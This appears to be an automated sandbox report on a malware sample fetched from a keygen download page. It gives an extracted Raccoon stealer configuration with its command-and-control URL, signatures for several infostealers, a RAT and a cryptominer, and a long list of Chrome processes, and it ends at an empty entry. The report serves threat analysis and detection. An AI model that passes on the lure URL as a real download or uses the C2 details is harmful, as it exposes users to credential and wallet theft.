Resubmissions

17-04-2021 18:41

210417-4m6sdqyqx2 10

17-04-2021 06:29

210417-mvqz54c7re 10

16-04-2021 14:15

210416-aa5qqagyce 10

Analysis

  • max time kernel
    1794s
  • max time network
    1698s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    16-04-2021 14:15

General

  • Target

    https://keygenit.com/d/a941ad21e610ns219454.html

  • Sample

    210416-aa5qqagyce

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 51 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 15 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
      PID:1428
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
      1⤵
        PID:1908
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2852
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2836
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/a941ad21e610ns219454.html
          1⤵
          • Enumerates system info in registry
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:644
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffbafb54f50,0x7ffbafb54f60,0x7ffbafb54f70
            2⤵
              PID:1500
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1516 /prefetch:2
              2⤵
                PID:3584
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1816 /prefetch:8
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3232
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 /prefetch:8
                2⤵
                  PID:2228
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2864 /prefetch:1
                  2⤵
                    PID:744
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:1
                    2⤵
                      PID:1472
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
                      2⤵
                        PID:1568
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
                        2⤵
                          PID:3808
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1
                          2⤵
                            PID:1928
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
                            2⤵
                              PID:4060
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4780 /prefetch:8
                              2⤵
                                PID:4340
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5328 /prefetch:8
                                2⤵
                                  PID:4668
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5632 /prefetch:8
                                  2⤵
                                    PID:4728
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5828 /prefetch:8
                                    2⤵
                                      PID:4756
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5932 /prefetch:8
                                      2⤵
                                        PID:4816
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5968 /prefetch:8
                                        2⤵
                                          PID:4852
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5708 /prefetch:8
                                          2⤵
                                            PID:4864
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5916 /prefetch:8
                                            2⤵
                                              PID:4924
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5764 /prefetch:8
                                              2⤵
                                                PID:4960
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6856 /prefetch:8
                                                2⤵
                                                  PID:4972
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6864 /prefetch:8
                                                  2⤵
                                                    PID:5008
                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                    2⤵
                                                      PID:5072
                                                      • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff78192a890,0x7ff78192a8a0,0x7ff78192a8b0
                                                        3⤵
                                                          PID:5092
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6380 /prefetch:8
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4140
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6268 /prefetch:8
                                                        2⤵
                                                          PID:4208
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6424 /prefetch:8
                                                          2⤵
                                                            PID:4344
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5816 /prefetch:8
                                                            2⤵
                                                              PID:4408
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6560 /prefetch:8
                                                              2⤵
                                                                PID:4496
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5900 /prefetch:8
                                                                2⤵
                                                                  PID:4532
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6104 /prefetch:8
                                                                  2⤵
                                                                    PID:424
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6116 /prefetch:8
                                                                    2⤵
                                                                      PID:4748
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5712 /prefetch:8
                                                                      2⤵
                                                                        PID:4804
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5988 /prefetch:8
                                                                        2⤵
                                                                          PID:4808
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5804 /prefetch:8
                                                                          2⤵
                                                                            PID:4768
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6128 /prefetch:8
                                                                            2⤵
                                                                              PID:5032
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6724 /prefetch:8
                                                                              2⤵
                                                                                PID:2956
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6112 /prefetch:8
                                                                                2⤵
                                                                                  PID:4924
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7512 /prefetch:8
                                                                                  2⤵
                                                                                    PID:5060
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7620 /prefetch:8
                                                                                    2⤵
                                                                                      PID:2080
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7780 /prefetch:8
                                                                                      2⤵
                                                                                        PID:2636
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7904 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4280
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7772 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4812
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8176 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4384
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8032 /prefetch:8
                                                                                              2⤵
                                                                                                PID:64
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8444 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:5000
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8476 /prefetch:8
                                                                                                  2⤵
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:4864
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8432 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:5076
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8620 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4876
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8632 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4288
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8644 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:1120
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8656 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:4740
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7280 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:5160
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9284 /prefetch:8
                                                                                                              2⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:5204
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:5308
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8320 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:5372
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9188 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:5448
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1576 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5512
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8216 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5556
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2000 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:5600
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1404 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:5616
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1396 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:5700
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4180 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:5744
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8676 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:5792
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9224 /prefetch:8
                                                                                                                            2⤵
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:5840
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1464,787943957961685173,761309978536666681,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8580 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:6080
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
